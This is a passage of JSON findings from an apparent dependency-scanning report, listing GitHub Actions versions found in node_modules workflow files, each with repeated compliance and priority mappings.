"requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "352cd9201a8ce90d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", "startLine": 0 }, "message": "Package discovered: actions/checkout v2", "title": "actions/checkout v2", "description": "Package discovered: actions/checkout v2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b54bfb1da26ce9cd", "name": "actions/checkout", "version": "v2", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", "accessPath": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/checkout@v2", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/checkout@v2" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3e33aad3d5646f4e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/busboy/.github/workflows/ci.yml", "startLine": 0 }, "message": "Package discovered: actions/checkout v2", "title": "actions/checkout v2", "description": "Package discovered: actions/checkout v2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8939931398f7f376", "name": "actions/checkout", "version": "v2", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/busboy/.github/workflows/ci.yml", "accessPath": "/node_modules/busboy/.github/workflows/ci.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/checkout@v2", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/checkout@v2" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c9bdf9f43faeb29d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/busboy/.github/workflows/lint.yml", "startLine": 0 }, "message": "Package discovered: actions/checkout v2", "title": "actions/checkout v2", "description": "Package discovered: actions/checkout v2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9ed4a1365893a541", "name": "actions/checkout", "version": "v2", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/busboy/.github/workflows/lint.yml", "accessPath": "/node_modules/busboy/.github/workflows/lint.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/checkout@v2", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/checkout@v2" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b70772177f81ea1d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/streamsearch/.github/workflows/ci.yml", "startLine": 0 }, "message": "Package discovered: actions/checkout v2", "title": "actions/checkout v2", "description": "Package discovered: actions/checkout v2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bf473f4674a4b4c1", "name": "actions/checkout", "version": "v2", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/streamsearch/.github/workflows/ci.yml", "accessPath": "/node_modules/streamsearch/.github/workflows/ci.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/checkout@v2", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/checkout@v2" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ec35dedecdc67bae", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/streamsearch/.github/workflows/lint.yml", "startLine": 0 }, "message": "Package discovered: actions/checkout v2", "title": "actions/checkout v2", "description": "Package discovered: actions/checkout v2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7ec5891cc205a593", "name": "actions/checkout", "version": "v2", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/streamsearch/.github/workflows/lint.yml", "accessPath": "/node_modules/streamsearch/.github/workflows/lint.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/checkout@v2", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/checkout@v2" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4424fb771af041f1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/stream-shift/.github/workflows/test.yml", "startLine": 0 }, "message": "Package discovered: actions/checkout v3", "title": "actions/checkout v3", "description": "Package discovered: actions/checkout v3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8effbdc22037c585", "name": "actions/checkout", "version": "v3", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/stream-shift/.github/workflows/test.yml", "accessPath": "/node_modules/stream-shift/.github/workflows/test.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/checkout@v3", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/checkout@v3" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a9754521213a3bbe", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/reusify/.github/workflows/ci.yml", "startLine": 0 }, "message": "Package discovered: actions/checkout v4", "title": "actions/checkout v4", "description": "Package discovered: actions/checkout v4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fd10fce47017fa13", "name": "actions/checkout", "version": "v4", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/reusify/.github/workflows/ci.yml", "accessPath": "/node_modules/reusify/.github/workflows/ci.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/checkout@v4", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/checkout@v4" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d2f68bf6461c8bf2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/busboy/.github/workflows/ci.yml", "startLine": 0 }, "message": "Package discovered: actions/setup-node v1", "title": "actions/setup-node v1", "description": "Package discovered: actions/setup-node v1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6b0792dcccc67817", "name": "actions/setup-node", "version": "v1", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/busboy/.github/workflows/ci.yml", "accessPath": "/node_modules/busboy/.github/workflows/ci.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/setup-node@v1", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/setup-node@v1" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e6602c50b5a9ed75", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/busboy/.github/workflows/lint.yml", "startLine": 0 }, "message": "Package discovered: actions/setup-node v1", "title": "actions/setup-node v1", "description": "Package discovered: actions/setup-node v1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0dc9162b75e9df6b", "name": "actions/setup-node", "version": "v1", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/busboy/.github/workflows/lint.yml", "accessPath": "/node_modules/busboy/.github/workflows/lint.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/setup-node@v1", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/setup-node@v1" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "75e343f3c07ad957", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/streamsearch/.github/workflows/ci.yml", "startLine": 0 }, "message": "Package discovered: actions/setup-node v1", "title": "actions/setup-node v1", "description": "Package discovered: actions/setup-node v1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "303b3812127b618f", "name": "actions/setup-node", "version": "v1", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/streamsearch/.github/workflows/ci.yml", "accessPath": "/node_modules/streamsearch/.github/workflows/ci.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/setup-node@v1", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/setup-node@v1" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f81ee12d2fe7942d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/streamsearch/.github/workflows/lint.yml", "startLine": 0 }, "message": "Package discovered: actions/setup-node v1", "title": "actions/setup-node v1", "description": "Package discovered: actions/setup-node v1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5dcd76ce8f7aa30c", "name": "actions/setup-node", "version": "v1", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/streamsearch/.github/workflows/lint.yml", "accessPath": "/node_modules/streamsearch/.github/workflows/lint.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/setup-node@v1", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/setup-node@v1" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": 